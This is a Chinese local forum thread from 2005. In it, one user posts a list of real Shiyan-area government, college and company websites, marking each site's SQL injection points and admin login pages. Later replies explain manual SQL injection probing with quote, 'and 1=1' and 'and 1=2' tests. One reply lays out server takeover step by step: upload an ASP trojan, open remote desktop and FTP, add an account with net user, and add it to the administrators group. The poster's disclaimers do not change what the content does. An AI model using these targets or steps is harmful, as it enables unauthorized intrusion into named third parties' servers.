郧西论坛»郧西论坛 郧西生活 吃喝玩乐 十堰网页漏洞地址和站点
最新回复
返回列表 发新帖

十堰网页漏洞地址和站点

[复制链接] 23
回复 8335
查看 打印 上一主题 下一主题
苦咖啡

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
跳转到指定楼层
1#
发表于 2005-5-3 04:32:31 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多郧西好友

您需要 登录 才可以下载或查看,没有帐号?注册

x
http://wwwsyeolcom/qyml/searchasp?sortid=1
管理员登陆入口
http://wwwsyeolcom/qyml//admin/loginasp
这就是你所谓的网页吗
                                          小小菜鸟: 苦咖啡
十堰银河星科技有限公司
http://wwwsyyhxcomcn/adminloginasp
注入点
http://wwwsyyhxcomcn/ShowArticleasp?classid=49&ArticleID=122
http://wwwsyjmgovcn/NewsClass2asp?ClassID=4 and 1=1
管理入口:http://wwwsyjmgovcn/adminadm存在表名:admin
管理入口:http://wwwsyjmgovcn/adminloginasp存在这个URL
管理入口:http://wwwsyjmgovcn/adminloginasp存在这个URL


郧阳师专
http://wwwyytcnetcn/news/xcb/adminloginasp
http://wwwyytcnetcn/news/xcb/newstxt/dbm6asp
注入点
http://wwwyytcnetcn/news/xcb/shownewsasp?NewsID=1028 and 1=1


十堰政务网
SQL注入点
http://wwwwddjnet/ztmoreasp?st=77


十堰科器
注入点
http://wwwke-qicom/shownewsasp?newsid=107
http://wwwsyjmgovcn/topiclistasp?topicid=11

湖北万联达汔车公司
http://wwwhbwldcomcn/ShowArticleasp?classid=2&ArticleID=21
http://wwwhbwldcomcn/showclassasp?classid=3

管理入口: http://wwwhbwldcomcn/uploadasp
管理入口: http://wwwhbwldcomcn/adminloginasp
http://wwwhbwldcomcn/AdminAdminasp

汔配城
注入点
http://wwwqpcitycomcn/card/cardasp?id=1

管理入口: http://wwwqpcitycomcn/card/adminasp
管理入口: http://wwwqpcitycomcn/card/connasp
管理入口: http://wwwqpcitycomcn/card/AdminLoginasp
管理入口: http://wwwqpcitycomcn/card/admindelasp
管理入口: http://wwwqpcitycomcn/card/adminloginasp
管理入口: http://wwwqpcitycomcn/card/adminloginasp


张湾财政局
http://wwwzwczgovcn/ShowClassasp?classid=85
http://wwwzwczgovcn/jgasp?classid=87

我看了一下十堰的网页,漏洞多的我都不想说了,相信会asp的人一看都知道这是什么意思
http://www.kukafei520.net/blog
回复

使用道具 举报

苦咖啡

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
2#
 楼主| 发表于 2005-5-3 04:40:40 | 显示全部楼层
我只不过喜欢网络安全但我有自己的原则
回复 支持 反对

使用道具 举报

苦咖啡

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
3#
 楼主| 发表于 2005-5-3 05:43:32 | 显示全部楼层
我只不过是喜欢网络安全,自己看的书多了就OK了不过今天也是在网上找一些有漏洞的网页和论坛才发现原来老家也有一个自己的BBS然后就在上面玩了
回复 支持 反对

使用道具 举报

苦咖啡

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
4#
 楼主| 发表于 2005-5-3 07:26:26 | 显示全部楼层
我~~~~
别提了很菜的
回复 支持 反对

使用道具 举报

苦咖啡

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
5#
 楼主| 发表于 2005-5-3 13:54:32 | 显示全部楼层
我都是买很多书然后看很多的服务器安全
没事的时候跑到网上去学着弄弄
这些其实是很简单的
回复 支持 反对

使用道具 举报

苦咖啡

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
6#
 楼主| 发表于 2005-5-4 08:57:22 | 显示全部楼层
这些网页都是SQL注入漏洞改天我在弄一些php注入的给大家看看
回复 支持 反对

使用道具 举报

苦咖啡

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
7#
 楼主| 发表于 2005-5-4 09:04:40 | 显示全部楼层
如果你想看一个网页有洞有SQL注入漏洞
1  选在后面加了'看返回的错误代码,注意一写要把IE设成显示好友错误才可以
2  在在后面加了 and 1=1这时页面是正常
3  在后面在重新加上and 1=2这时也是错误显示才对
记注每一次加完以后,回复到原始地址在加,不是在加过的后面在加
这是最简单手动查找SQL注入漏洞的方法
回复 支持 反对

使用道具 举报

苦咖啡

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
8#
 楼主| 发表于 2005-5-4 09:09:12 | 显示全部楼层
共同进步是我的原则
回复 支持 反对

使用道具 举报

苦咖啡

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
9#
 楼主| 发表于 2005-5-4 09:30:35 | 显示全部楼层
没什么大家没事可以自己去网上找一下用我说的方法去可以拿很很多的肉鸡,只要你上传了ASP木马然后在上传一个开3389和FTP木马,用net user 用户名  密码  /add
然后在用net localgroup administrators 你刚设的用户名 /add就可以把自己的权限提升到管理员权限了
然后用net user 用户名 查看一下自己是不是administrators管理组了
然后去下一个远程屏幕连接工具就这样轻松搞定一台肉鸡了并且还是服务器的肉鸡哦
回复 支持 反对

使用道具 举报

苦咖啡

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
10#
 楼主| 发表于 2005-5-4 11:48:43 | 显示全部楼层
这些只是一些网络安全最基本的东西
明天我发一些如何维护自己的计算机
回复 支持 反对

使用道具 举报

苦咖啡

86

主题

525

帖子

525

积分

荣誉会员

Rank: 4

积分
525
QQ
11#
 楼主| 发表于 2005-5-4 12:07:34 | 显示全部楼层
这就发只要大家喜欢就行试试可以但千万不要改别人服务器里面的东西
回复 支持 反对

使用道具 举报

返回列表 发新帖

发表回复
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

郧西论坛微信公众号
快速回复 返回顶部 返回列表